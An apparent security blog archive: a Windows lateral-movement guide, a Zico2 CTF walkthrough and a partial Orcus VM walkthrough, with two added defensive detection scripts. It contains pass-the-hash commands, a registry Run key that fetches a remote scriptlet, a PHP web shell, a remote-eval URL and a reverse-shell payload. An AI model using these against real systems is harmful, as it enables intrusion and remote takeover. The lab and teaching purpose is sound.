Monday, November 6, 2017

Windows Lateral Movement Fu

In this post I'm going to detail Windows lateral movement tools, techniques and procedures (TTPs). Wikipedia defines lateral movement as the techniques cyber attackers, or "threat actors", use to progressively move through a network as they search for the key data and assets that are ultimately the target of their attack campaigns. This definition is a bit too broad, as it would cover everything a threat actor does between attaining a foothold and exfiltrating data. The main focus of this post is the ways an attacker could gain code execution on other systems on a victim network once they have an initial foothold or a valid set of credentials. These credentials could be stolen from centralized software installation systems, keyloggers, ARP spoofing, network sniffing or password dumping toys like Pwdump, Windows Credential Editor (WCE), Mapiget, Lslsass, Gsecdump, CacheDump, Mimikatz, etc.

The PowerShell era gave attackers a native way of interacting with the Windows core without having to use compiled code, as well as an interactive .NET playground. Some of the techniques below can be achieved with or without PowerShell. I'll try to highlight ways of achieving the same task with PowerShell wherever possible.

The following set of techniques assumes the attacker has a valid set of credentials/hashes and/or a command shell on the target network. I'll start with every pentester's favorite lateral movement technique.

1.  PsExec

This tool is usually run after using Mimikatz to dump credentials from memory. What makes it really amazing is that the binary is Microsoft signed, although some AVs do flag it. Of course Microsoft's implementation of this tool doesn't support using hashes for authentication. Metasploit's and Impacket's implementations of this tool allow us to use either hashes (NTLM) or clear-text credentials, whichever you can get your hands on.



The Metasploit way

Metasploit has its own implementation of the same tool. This one allows us to pass the hashes if we don't have the clear-text credentials.




Note that Metasploit has two implementations of the psexec module, a legacy one and a PowerShell version. I've found the PowerShell version to be more reliable.

Impacket way

psexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1




2.  Windows Management Instrumentation (WMI)

WMI is the infrastructure for management data and operations on Windows-based operating systems. WMI enables devices and systems in a network to be managed and controlled centrally. This is another attacker favorite since it's enabled by default and doesn't require any additional toys on the compromised system. With it you can basically execute code on a remote system.



We can see the notepad process has been executed on the target system.



Now let's try something more evil.



Back in our Metasploit we get a reverse shell.



In case you don't know how I generated the rev_https.sct file, google subtee's Bypass Application Whitelisting Script Protections.

Impacket

Like psexec, Impacket has a toy you can deploy directly from Kali that can take both hashes and plain-text passwords.

wmiexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1



Powershell

Note that with newer versions of Windows, i.e. 2012+, WMIC is deprecated. PowerShell provides the same functionality with the Invoke-WMIMethod cmdlet. So let's see what Invoke-WMIMethod can do for us.

Let's first generate the payload.



Set up our Metasploit handler.



We can see that we got a reverse connection on execution.



PowerSploit also has its own WMI implementation called Invoke-WmiCommand. I'll leave that one as an exercise to those following along.

3.  Windows Remote Management (WinRM)

Microsoft defines WinRM as a remote management service that allows hardware and operating systems from different vendors to interoperate. WinRM is the server part of the application and WinRS (Windows Remote Shell) is the client part. The service has to be enabled on both systems for it to work. We'll use the WinRS tool when running commands on the target system. Windows Remote Management isn't enabled by default, but when it is, it has the look and feel of the psexec binary. It's relatively trivial to use: you basically have a shell on the target system. If the boxes are in an Active Directory environment there's no need to provide credentials, since the machines have Kerberos trust between them.



My test machines are domain joined; if you want to try these out without domain joining the boxes, check out this link.

There are a number of PowerShell implementations of Windows Remote Management. We're going to see some of them in action. Invoke-Command and the PSSession commands are more or less the same; the main difference between them is that the former can be unleashed on multiple boxes with a single command, while PSSession can only run on one box.

Invoke-Command



Note: The download cradle was obfuscated by Daniel Bohannon's Invoke-CradleCrafter

Invoke-Command is quite flexible; you can give it a path to a file to execute on the remote system. As with all inbuilt PowerShell commands, Get-Help is your friend.

PSSession

Let's see what the PSSession commands can do for us.



A variation of the PSSession set of commands is Enter-PSSession; you can guess from the name that it gives you an interactive session on the target machine. As you know, Metasploit and interactive sessions don't play well together, so I'll run it from a Windows box.



We can even mix it up to run commands on the target system.



4.  Service Control (SC)

SC.exe is an inbuilt Windows utility that retrieves and sets control information about services. It's a powerful little utility that can start, stop and interact with Windows services, and the fact that it can be used to control other systems' services remotely makes it an interesting tool for lateral movement. Using a normal exe binary with sc will cause it to die immediately after execution. This means we have to generate a binary that's capable of responding to service control commands. Lucky for us, Metasploit can generate such binaries. The downside is that it'll probably be flagged by AV, since all Metasploit containers are deemed dangerous. You'll have to modify the binary to evade AV. AV evasion is beyond the scope of this post, but you can read more on how to do it from here and here.





Let's transfer our shiny new evil binary to the system we control.



We'll check to make sure the service we're trying to create doesn't exist before we actually create it.



5.  Scheduled Tasks

This technique is super flexible: you can schedule the tasks to run on an event trigger, for example on system logon, and you can fine tune it to run on the days of your choice. This also makes it a potent persistence technique. The catch, of course, is that it requires admin rights on the target system.



For good opsec we'll remove the scheduled task and also check to make sure it has been removed.



6.  AT

This is the younger brother of scheduled tasks. It's not as powerful as scheduled tasks, but for what we want to accomplish it's sufficient. You can schedule commands and programs to run on a computer at a specified time and date.



7.  MMC20.Application DCOM

All the other techniques discussed in this post have been around for an eternity. This next one was discovered / made public by enigma0x3. It takes advantage of the fact that the Distributed Component Object Model (DCOM) has the ability to interact with objects over the network. He gives a detailed account of how he enumerated the objects and eventually got code execution in his blog post here. He has variations of this technique where he abuses MS Office to achieve code execution; read about them here. I advise everyone starting out to read this guy's whole website.



We get an Empire reverse shell.



8.  RDP

The RDP protocol is as old as the hills. Its syntax is pretty straightforward.




9.  Remote File Access

The next couple of techniques require the compromised system to have read-write file permissions on the entire root drive of another system. We have to wait for the targeted system to be restarted, then we get our reverse shell. This can also double as a persistence technique unless you explicitly remove the uploaded trojan.

Robocopy




Xcopy

This is the younger brother of robocopy. Only the syntax changes; the functionality remains the same. You can read more about it here.




There are variations of this technique in that you can leverage DLL hijacking, or plant DLLs at specific locations, to get code execution. These techniques can even double as privilege escalation techniques depending on folder permissions and Windows version. More information on how that can be achieved is available here.

10.  Remote Registry Access / Manipulation

Writing to any of these registry keys will trigger code execution. These locations are also malware favorites for persistence. HKCU can be substituted for HKLM; the only difference is that HKCU will execute under the context of the current user while HKLM will execute under the context of whoever is logged on.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
REG ADD \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v evilkey /t REG_SZ /d "regsvr32 /s /n /u /i:http://192.168.83.175/Expendable/rev_https.sct scrobj.dll"
REG QUERY \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run
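From the defender's side, the same autorun locations are what a registry-write detection should watch. The following Python script is an added example and not from the post: it checks registry SetValue events against the four keys listed above (in both HKLM and HKCU), and raises the severity when the written data fetches a payload over HTTP or uses the regsvr32 / scrobj.dll scriptlet trick from the REG ADD example. The events are constructed, in a simplified key=value line format that borrows Sysmon's TargetObject, Details and Image field names; attributing the first write to svchost.exe, as the host of the RemoteRegistry service that would service a remote REG ADD, is an assumption.

```python
import re

# Constructed sample events (not real telemetry): one registry SetValue
# record per line. Field names follow Sysmon's registry event (TargetObject
# = full value path written, Details = data written, Image = writing process).
# Line 1 mirrors the post's REG ADD example; svchost.exe as the writer is an
# assumption about how a remote registry write would be attributed.
SAMPLE_EVENTS = r"""
utc=2017-11-06T14:02:11 host=WS01 event=SetValue Image="C:\Windows\System32\svchost.exe" TargetObject="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\evilkey" Details="regsvr32 /s /n /u /i:http://192.168.83.175/Expendable/rev_https.sct scrobj.dll"
utc=2017-11-06T14:05:40 host=WS01 event=SetValue Image="C:\Program Files\Vendor\setup.exe" TargetObject="HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent" Details="C:\Program Files\Vendor\agent.exe"
utc=2017-11-06T14:06:02 host=WS01 event=SetValue Image="C:\Windows\explorer.exe" TargetObject="HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" Details="1"
utc=2017-11-06T14:09:17 host=WS02 event=SetValue Image="C:\Windows\System32\svchost.exe" TargetObject="HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell" Details="explorer.exe, C:\Users\Public\update.exe"
"""

# Autorun locations from the post, upper-cased and without the hive prefix;
# both the HKLM and the HKCU variant are treated as autorun keys.
AUTORUN_SUBKEYS = {
    r"SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN",
    r"SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE",
    r"SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN",
    r"SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON",
}
HIVE_ALIASES = {"HKEY_LOCAL_MACHINE": "HKLM", "HKEY_CURRENT_USER": "HKCU"}

# Data patterns that escalate an autorun write: a payload referenced by URL,
# or regsvr32 loading a scriptlet through scrobj.dll as in the post.
REMOTE_PAYLOAD_RE = re.compile(r"https?://", re.I)
SCROBJ_RE = re.compile(r"\bregsvr32\b.*\bscrobj\.dll\b", re.I)

# key=value with optional double-quoted value (quoted values may hold spaces).
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn one key=value line into a dict of field name -> value."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD_RE.finditer(line)}


def split_target(target):
    """Split 'HIVE\\sub\\key\\ValueName' into (HIVE, SUBKEY, value_name)."""
    parts = target.split("\\")
    hive = HIVE_ALIASES.get(parts[0].upper(), parts[0].upper())
    return hive, "\\".join(parts[1:-1]).upper(), parts[-1]


def classify(event):
    """Return a finding for a write to an autorun key, or None otherwise."""
    if event.get("event") != "SetValue" or "TargetObject" not in event:
        return None
    hive, subkey, value_name = split_target(event["TargetObject"])
    if hive not in ("HKLM", "HKCU") or subkey not in AUTORUN_SUBKEYS:
        return None
    data = event.get("Details", "")
    reasons, severity = ["write to autorun key"], "medium"
    if SCROBJ_RE.search(data):
        reasons.append("regsvr32 scriptlet (scrobj.dll) execution")
        severity = "high"
    if REMOTE_PAYLOAD_RE.search(data):
        reasons.append("payload referenced by URL")
        severity = "high"
    return {"utc": event.get("utc"), "host": event.get("host"),
            "writer": event.get("Image"), "key": hive + "\\" + subkey,
            "value": value_name, "data": data,
            "severity": severity, "reasons": reasons}


def analyze_events(text):
    """Run classify() over every non-empty line and collect the findings."""
    findings = []
    for line in text.splitlines():
        if line.strip():
            finding = classify(parse_event(line))
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print("[%s] %s %s %s\\%s written by %s: %s" % (
            f["severity"].upper(), f["utc"], f["host"], f["key"], f["value"],
            f["writer"], "; ".join(f["reasons"])))
```

Run against the sample, the two Run-key writes and the Winlogon write are reported and the Explorer preference write is ignored; the regsvr32 line is the only high-severity finding.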




-Pass the ticket

References

https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
https://www.scriptjunkie.us/2013/02/authenticated-remote-code-execution-methods-in-windows/
https://posts.specterops.io/lateral-movement-using-excel-application-and-dcom-enigma0x3-on-wordpress-com-d11d56e504dc
http://www.fuzzysecurity.com/tutorials/19.html


Wednesday, October 11, 2017

Owning Zico2

Over the past week, VulnHub dropped about 20 wargames. I decided to try my hand at a couple. I'll be blogging as I solve them, time allowing. This is my walkthrough for the Zico2 CTF.

After loading the VM into VMware, I scanned it with nmap. Port 80 as usual appeared to be the most interesting, so I fired up nikto and then dirsearch, in that order.
root@kali:/tmp# nmap -sT -A -PO -n -v 192.168.83.133
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-09 09:39 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating ARP Ping Scan at 09:40
Scanning 192.168.83.133 [1 port]
Completed ARP Ping Scan at 09:40, 0.22s elapsed (1 total hosts)
Initiating Connect Scan at 09:40
Scanning 192.168.83.133 [1000 ports]
Discovered open port 22/tcp on 192.168.83.133
Discovered open port 80/tcp on 192.168.83.133
Discovered open port 111/tcp on 192.168.83.133
Completed Connect Scan at 09:40, 0.03s elapsed (1000 total ports)
Initiating Service scan at 09:40
Scanning 3 services on 192.168.83.133
Completed Service scan at 09:40, 6.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.83.133
adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
NSE: Script scanning 192.168.83.133.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.29s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.01s elapsed
Nmap scan report for 192.168.83.133
Host is up (0.00053s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 35817/udp status
|_ 100024 1 49910/tcp status
MAC Address: 00:0C:29:A2:5A:63 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Uptime guess: 198.046 days (since Sat Mar 25 08:33:47 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.83.133
NSE: Script Post-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.23 seconds
Raw packets sent: 36 (2.850KB) | Rcvd: 32 (2.322KB)
root@kali:~/dirsearch# nikto -h http://192.168.83.133
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.83.133
+ Target Hostname: 192.168.83.133
+ Target Port: 80
+ Start Time: 2017-10-09 09:40:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ 8346 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-10-09 09:40:49 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~/dirsearch# ./dirsearch.py -u http://192.168.83.133/ -e php 

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 5992

Error Log: /root/dirsearch/logs/errors-17-10-09_09-50-00.log

Target: http://192.168.83.133/

[09:50:00] Starting: 
[09:50:02] 403 -  286B  - /.hta
[09:50:02] 403 -  293B  - /.ht_wsr.txt
[09:50:02] 403 -  297B  - /.htaccess-local
[09:50:02] 403 -  295B  - /.htaccess-dev
[09:50:02] 403 -  295B  - /.htaccess.BAK
[09:50:02] 403 -  297B  - /.htaccess-marco
[09:50:02] 403 -  295B  - /.htaccess.old
[09:50:02] 403 -  296B  - /.htaccess.bak1
[09:50:02] 403 -  298B  - /.htaccess.sample
[09:50:02] 403 -  296B  - /.htaccess.orig
[09:50:02] 403 -  296B  - /.htaccess.save
[09:50:02] 403 -  295B  - /.htaccess.txt
[09:50:02] 403 -  297B  - /.htaccess_extra
[09:50:02] 403 -  296B  - /.htaccess_orig
[09:50:02] 403 -  294B  - /.htaccessBAK
[09:50:02] 403 -  295B  - /.htaccessOLD2
[09:50:02] 403 -  294B  - /.htaccessOLD
[09:50:03] 403 -  294B  - /.htaccess_sc
[09:50:03] 403 -  292B  - /.htaccess~
[09:50:03] 403 -  290B  - /.htgroup
[09:50:03] 403 -  295B  - /.htpasswd-old
[09:50:03] 403 -  296B  - /.htpasswd_test
[09:50:03] 403 -  290B  - /.htusers
[09:50:03] 403 -  292B  - /.htpasswds
[09:50:18] 403 -  290B  - /cgi-bin/
[09:50:21] 301 -  314B  - /css  ->  http://192.168.83.133/css/
[09:50:21] 301 -  318B  - /dbadmin  ->  http://192.168.83.133/dbadmin/
[09:50:21] 200 -  917B  - /dbadmin/
[09:50:22] 403 -  286B  - /doc/
[09:50:22] 403 -  301B  - /doc/en/changes.html
[09:50:22] 403 -  300B  - /doc/stable.version
[09:50:24] 200 -    3KB - /gulpfile.js
[09:50:25] 301 -  314B  - /img  ->  http://192.168.83.133/img/
[09:50:25] 200 -    8KB - /index
[09:50:26] 200 -    8KB - /index.html
[09:50:27] 301 -  313B  - /js  ->  http://192.168.83.133/js/
[09:50:27] 200 -    1KB - /LICENSE
[09:50:34] 200 -  789B  - /package.json
[09:50:34] 200 -  789B  - /package
[09:50:38] 200 -    1KB - /README.md 
[09:50:40] 403 -  295B  - /server-status
[09:50:40] 403 -  296B  - /server-status/
[09:50:44] 200 -    8KB - /tools
[09:50:45] 200 -    0B  - /view.php

Task Completed
The dbadmin folder obviously looked the most interesting, so I quickly browsed it. This in turn led me to http://192.168.83.133/dbadmin/test_db.php. At the prompt I logged in with the default credentials of admin. I then searched for existing vulnerabilities in phpLiteAdmin.


At this point I tried to follow along with what the advisory said but was a little handicapped since the screenshots were no longer up.
The screenshots below show how I managed to execute code on the Zico2 box.




Click "Go"



Fill in as shown in the screenshot (under the Default Value field put <?php phpinfo()?> as in the advisory) then click "Create".
You should be greeted with a message showing that the table was successfully created, as in the screenshot below.



After that click on "/usr/databases/test.php", then click the "Rename Database" tab.



I chose that folder (dbadmin) since that's the location of the default test_db.php file.
At this point, browsing to http://192.168.83.133/dbadmin/west.php should display the phpinfo page to us, as in the screenshot below.



Now we know we have code execution. The next step is to upload something more evil, like a command shell. When I directly uploaded a command shell it didn't work, so I base64 encoded it.
The steps for uploading are the same as above, with the small difference of base64 encoding it.

root@kali:/tmp# cp /usr/share/webshells/php/simple-backdoor.php .


Modify it and remove the PHP tags so it looks like below.

root@kali:/tmp# cat simple-backdoor.php 
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
Now base64 encode it:
root@kali:/tmp# msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=simple-backdoor.php
No platform was selected, choosing Msf::Module::Platform from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 226 (iteration=0)
php/base64 chosen with final size 226
Payload size: 226 bytes
eval(base64_decode(aWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpewogICAgICAgIGVjaG8gIjxwcmU.chr(43).IjsKICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOwogICAgICAgIHN5c3RlbSgkY21kKTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoK));

Paste the resulting code into the default value field.

<?php <base64 encoded code goes here without the angle brackets :-)> ?>



As before, rename the database to whatever you like; I named mine bd.php. We should now have a functional shell.
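A defender who finds a file like bd.php in a web root wants to know what the eval(base64_decode(...)) wrapper hides. The following Python helper is an added example, not from the post: it recognises the wrapper that msfvenom's php/base64 encoder emits, rebuilds the base64 text from the PHP concatenation (the encoder writes characters outside the bareword set, such as '+', as .chr(N). calls), decodes it and lists the command-execution functions in the recovered source. The sample input is the encoded payload from the msfvenom output above.

```python
import base64
import re

# Sample input copied from the msfvenom php/base64 output shown in the post;
# the '+' of the base64 text has become the PHP expression .chr(43).
SAMPLE_WEBSHELL = (
    "eval(base64_decode("
    "aWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpewogICAgICAgIGVjaG8gIjxwcmU"
    ".chr(43)."
    "IjsKICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOwogICAgICAgIHN5c3RlbSgk"
    "Y21kKTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoK"
    "));"
)

# eval(base64_decode( <argument> )); with the argument captured non-greedily
WRAPPER_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\((.*?)\)\s*\)\s*;", re.S)
# one piece of the concatenated argument that is a chr(N) call
CHR_RE = re.compile(r"^chr\((\d+)\)$")
# PHP functions that execute commands or evaluate code
DANGEROUS_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(")


def rebuild_argument(arg):
    """Reassemble base64 text from a PHP concatenation of barewords, quoted
    strings and chr(N) calls, e.g. aWYo.chr(43).IjsK -> aWYo+IjsK."""
    out = []
    for piece in arg.split("."):
        piece = piece.strip().strip("'\"")
        if not piece:
            continue                      # empty piece from a leading/trailing dot
        m = CHR_RE.match(piece)
        out.append(chr(int(m.group(1))) if m else piece)
    return "".join(out)


def decode_wrappers(php_source):
    """Return the decoded payload of every eval(base64_decode()) wrapper found."""
    decoded = []
    for m in WRAPPER_RE.finditer(php_source):
        b64 = rebuild_argument(m.group(1))
        b64 += "=" * (-len(b64) % 4)      # restore any stripped padding
        try:
            decoded.append(base64.b64decode(b64).decode("utf-8", "replace"))
        except ValueError:                # binascii.Error is a ValueError
            continue
    return decoded


def dangerous_calls(php_source):
    """Sorted names of command-execution / code-evaluation functions used."""
    return sorted(set(DANGEROUS_RE.findall(php_source)))


def triage(php_source):
    """Decode each wrapper in a file and report what the hidden code calls."""
    return [{"source": src, "dangerous_calls": dangerous_calls(src)}
            for src in decode_wrappers(php_source)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_WEBSHELL):
        print("dangerous calls:", ", ".join(hit["dangerous_calls"]))
        print(hit["source"])
```

On the sample the decoded text is the simple-backdoor.php source shown earlier, and system() is the one command-execution call it reports.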



However, this shell is a little limited, so we'll use Metasploit to get a better shell.


http://192.168.83.133/dbadmin/bd.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval%28file_get_contents%28%27http://192.168.83.175:8081/RwdifigI%27%29%29;%22
#I didn't like this shell either, since it kept dying on me.
root@kali:/tmp# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.83.175 LPORT=9999 EXITFUNC=thread -a x64 -f elf -o shell9999.elf
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell9999.elf
root@kali:/tmp# file shell9999.elf
shell9999.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, corrupted section header size
root@kali:/tmp# cp shell9999.elf /var/www/html/
root@kali:/tmp# nc -lvp 9999
listening on [any] 9999 ...


I downloaded the Linux Exploit Suggester onto the system and the first exploit did the trick. gcc wasn't working well on the victim box, so I compiled the exploit on another box, then transferred it back to the victim box, which gave me a root shell.


Finally I browsed to the root folder and read the flag.txt file. At this point I was obliged to do the rewt dance :-)


Thanks to Rafael and the team over at vulnhub for the challenges.

Monday, March 27, 2017

Solving hackfest2016: Orcus VM

It's taken me a while to pwn this challenge, partly because it runs too many services and web apps and partly because of my lousy attention span. I went down a certain path, burnt about 6 hours, only to make no serious progress and return to the enumeration phase. Probably my biggest takeaway from this box is to thoroughly map the application before attempting exploitation and avoid skipping around; this helps prevent futile attempts made with limited knowledge.
Enough with the philosophical yadda yaddah.
First I fired up nmap and, as in the previous series, a gazillion services were running.
root@kali:/tmp# nmap -sT -A -PO 172.16.94.136
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-20 14:13 EDT
Nmap scan report for 172.16.94.136
Host is up (0.0055s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP STLS CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 50518/udp mountd
| 100005 1,2,3 58138/tcp mountd
| 100021 1,3,4 33074/tcp nlockmgr
| 100021 1,3,4 56493/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ENABLE IMAP4rev1 more have post-login IDLE ID SASL-IR listed capabilities STARTTLS OK LOGINDISABLEDA0001 Pre-login LOGIN-REFERRALS LITERAL+
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP USER CAPA RESP-CODES SASL(PLAIN) AUTH-RESP-CODE UIDL PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 00:0C:29:74:06:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h59m23s, deviation: 0s, median: 2h59m23s
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: \x00
| NetBIOS computer name: ORCUS\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2017-03-20T17:14:14-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
